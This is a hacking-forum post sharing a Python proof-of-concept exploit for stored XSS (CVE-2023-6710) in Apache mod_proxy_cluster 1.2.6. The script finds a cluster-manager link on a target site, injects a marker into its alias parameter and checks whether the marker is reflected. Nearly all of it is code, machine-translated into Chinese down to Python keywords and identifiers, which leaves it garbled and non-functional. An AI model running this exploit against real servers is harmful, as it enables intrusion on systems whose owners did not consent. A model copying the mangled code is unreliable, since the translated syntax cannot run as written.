H

apache mod_proxy_cluster 1.2.6-存储的XSS

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
导入请求
导入argparse
来自BS4进口美丽的小组
来自urllib.parse导入urlparse,parse_qs,urlencode,urlunparse
从请求。
类颜色:
红色='\ 033 [91m'
绿色='\ 033 [1; 49; 92m'
reset='\ 033 [0M'
def get_cluster_manager_url(base_url,路径):
print(colors.green + f'p'peparge {base_url} .' + colors.reset上的探索的基础
TRY:
响应=requests.get(base_url +路径)
response.raise_for_status()
除了requests.exceptions.requestexception为e:
print(colors.red + f'Error: {e}' + colors.reset)
没有返回
print(colors.green + f'starting漏洞利用{base_url} .' + colors.reset)
if antsphy.status_code==200:
print(colors.green + f'Check在{base_url} .' + colors.reset上成功执行
#使用Beautifulsoup解析HTML内容
汤=beautifutsoup(响应。文本,'html.parser')
#带有'href'属性的所有“ a”标签
all_links=soup.find_all('a',href=true)
#搜索HREF属性中包含别名参数的链接
cluster_manager_url=无
对于all_links:中的链接
parsed_url=urlparse(link ['href'])
query_params=parse_qs(parsed_url.query)
alias_value=query_params.get('别名',[none])[0]
如果alias_value:
print(颜色。
cluster_manager_url=链接['href']
休息
如果cluster_manager_url:
print(colors.green + f'pepare {base_url} .' + colors.reset上的注入)
返回cluster_manager_url
其他:
print(colors.red + f'Error:别名值在{base_url} .' + colors.reset上找不到
没有返回
print(colors.red + f'Error:无法在{base_url}'上获得初始步骤
没有返回
DEF UPDATE_ALIAS_VALUE(URL):
parsed_url=urlparse(url)
query_params=parse_qs(parsed_url.query,keep_blank_values=true)
query_params ['alias']=['dedsec-47']
updated_url=urlunparse(parsed_url._replace(query=urlencode(query_params,doseq=true)))))))
print(colors.green + f'Indyvention在{updated_url}' + colors.reset上成功执行
返回Updated_url
def check_response_for_value(url,check_value):
响应=requests.get(url)
如果check_value在wenders.text:
print(colors.red +'网站是脆弱的POC by :')
打印(颜色.green +'''
_____ _____ _ ______
| _ \ _ __ |/_ | __ _ | || | ___ |
| | | |/_ \/` \ __ \/_ \/__ | ____ | || |///
| | _ | | /(_ | | __)| __ /(_ | __ | _ |////
| __/\ _ | \ ,_ | __/\ __ | \ _ | | _ |/_/
github.com/dedsec-47'')
其他:
print(colors.green +'网站不是:'的易受伤害的POC)
打印(颜色.green +'''
_____ _____ _ ______
| _ \ _ __ |/_ | __ _ | || | ___ |
| | | |/_ \/` \ __ \/_ \/__ | ____ | || |///
| | _ | | /(_ | | __)| __ /(_ | __ | _ |////
| __/\ _ | \ ,_ | __/\ __ | \ _ | | _ |/_/
github.com/dedsec-47'')
def main():
#创建命令行参数解析器
parser=argparse.argumentparser(Description='Python CVE-2023-6710.PY -T https://example.com -U /cluster-Manager')
#添加目标(-t/- 目标)的命令行参数
parser.add_argument(' - t',' - target',help='目标域(例如https://example.com)',必需=true)
#添加url路径(-u/- url)的命令行参数
parser.add_argument(' - u',' - url',help='url路径(例如/cluster-manager)',必需=true)
#解析命令行参数
args=parser.parse_args()
#从指定网站获取群集管理器URL
cluster_manager_url=get_cluster_manager_url(args.target,args.url)
#检查群集管理器是否找到
如果cluster_manager_url:
#通过添加群集管理器值修改URL
modified_url=args.target + cluster_manager_url
modified_url=update_alias_value(args.target + cluster_manager_url)
打印(colors.green +'检查成功执行' + colors.reset)
#检查值“ DEDSEC-47”的响应
check_response_for_value(modified_url,'dedsec-47')
如果name=='__ -Main __':
主要的()
 
后退
顶部